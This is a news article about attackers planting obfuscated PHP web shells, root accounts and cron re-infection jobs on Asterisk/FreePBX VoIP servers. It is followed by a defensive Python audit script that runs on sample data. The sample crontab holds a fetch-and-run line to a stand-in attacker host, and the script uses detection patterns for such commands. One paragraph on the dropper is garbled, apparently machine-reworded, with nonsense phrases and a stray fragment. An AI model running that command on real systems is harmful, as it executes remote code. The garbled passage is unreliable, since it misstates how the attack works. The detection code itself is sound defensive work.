Hackers targeting VoIP servers running Digium phone software

VoIP phones running Digium's software have been targeted to drop a web shell on their servers as part of an attack campaign designed to exfiltrate data by downloading and executing additional payloads.

Palo Alto Networks Unit 42 said in a Friday report, “The malware installs a multilayered obfuscated PHP backdoor into the web server's file system, downloads new payloads for execution, and schedules recurring tasks to re-infect the host system.”

The unusual activity is said to have started in mid-December 2021 and targets Asterisk, a widely used software implementation of a private branch exchange (PBX) that runs on the open-source Elastix unified communications server.

Unit 42 said the intrusions shared similarities with the INJ3CTOR3 campaign, which Israeli cybersecurity firm Check Point uncovered in November 2020, pointing to the possibility that they could be a “resurrection” of the earlier attacks.

The sudden surge coincided with the public disclosure in December 2021 of a now-patched remote code execution flaw in FreePBX, a web-based open source GUI used to control and manage Asterisk. Tracked as CVE-2021-45461, the issue is rated 9.8 out of 10 for severity.

The assaults start with acquiring an preliminary dropper shell script from a distant server, which, in flip, installs the PHP net shell in several areas within the file system in addition to creating two root person accounts to take care of distant entry. is orchestrated.

It further creates a scheduled task that runs every minute and retrieves a fresh copy of the shell script from the attacker-controlled domain for execution.

In addition to taking measures to cover its tracks, the malware is also equipped to run arbitrary commands, ultimately allowing the attackers to take control of the systems and steal information, while maintaining a backdoor into the compromised hosts.
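The persistence traits described above (extra root accounts, a cron job that runs every minute and pulls a remote script into a shell, and an obfuscated PHP file in the web root) are the kind of thing a defender can audit for on a PBX host. The following is an added example, not code from Unit 42 or the original article; it runs over constructed sample data only, and the account names, domain and file names in it are placeholders rather than indicators from the report.

```python
"""Added example (not from the Unit 42 report or the article): audit helpers
that flag the persistence traits described in the text. All input below is
constructed sample data; run the functions against real /etc/passwd, crontab
and web root contents to use them on a host."""
import re

# Constructed sample /etc/passwd. 'svc' and 'adm2' are hypothetical names
# standing in for attacker-created root-equivalent accounts.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
asterisk:x:997:997::/var/lib/asterisk:/sbin/nologin
svc:x:0:0::/root:/bin/bash
adm2:x:0:0::/root:/bin/sh
"""

# Constructed sample crontab; the domain is a placeholder (.invalid TLD).
SAMPLE_CRONTAB = """0 2 * * * /usr/local/bin/backup.sh
* * * * * curl -s http://attacker.invalid/x.sh | sh
*/5 * * * * /usr/bin/python3 /opt/monitor.py
"""

# Constructed sample web root: one ordinary file, one file that stacks
# decoding/eval primitives the way an obfuscated PHP backdoor typically does.
SAMPLE_WEBROOT = {
    "index.php": "<?php echo 'hello'; ?>",
    "cache.php": "<?php eval(gzinflate(base64_decode('PLACEHOLDER'))); ?>",
}

# A download tool whose output is piped straight into a shell interpreter.
REMOTE_FETCH_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")

# Primitives that, when combined, usually indicate layered obfuscation.
OBFUSCATION_MARKERS = ("eval(", "base64_decode(", "gzinflate(", "str_rot13(")


def extra_root_accounts(passwd_text):
    """Return every username with UID 0 other than 'root'."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            found.append(fields[0])
    return found


def suspicious_cron_entries(crontab_text):
    """Return cron lines that run every minute and pipe a download into a shell."""
    hits = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        parts = line.split(None, 5)
        if len(parts) < 6:
            continue
        schedule, command = parts[:5], parts[5]
        every_minute = schedule == ["*"] * 5
        if every_minute and REMOTE_FETCH_TO_SHELL.search(command):
            hits.append(line)
    return hits


def obfuscated_php_files(files, threshold=2):
    """Return file names whose content uses at least `threshold` obfuscation primitives."""
    flagged = []
    for name, content in files.items():
        score = sum(content.count(marker) for marker in OBFUSCATION_MARKERS)
        if score >= threshold:
            flagged.append(name)
    return sorted(flagged)


if __name__ == "__main__":
    print("extra UID-0 accounts:", extra_root_accounts(SAMPLE_PASSWD))
    print("suspicious cron entries:", suspicious_cron_entries(SAMPLE_CRONTAB))
    print("obfuscated PHP files:", obfuscated_php_files(SAMPLE_WEBROOT))
```

The cron check deliberately requires both conditions (an every-minute schedule and a fetch piped into a shell) so that legitimate frequent jobs do not trip it; the PHP check counts distinct decoding and eval primitives rather than matching any single one, because a lone base64_decode call is common in benign code.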

“The strategy of implanting web shells in vulnerable servers is not a new tactic for malicious actors,” the researchers said, adding that it is a “common approach that malware authors take to launch exploits or run commands remotely.”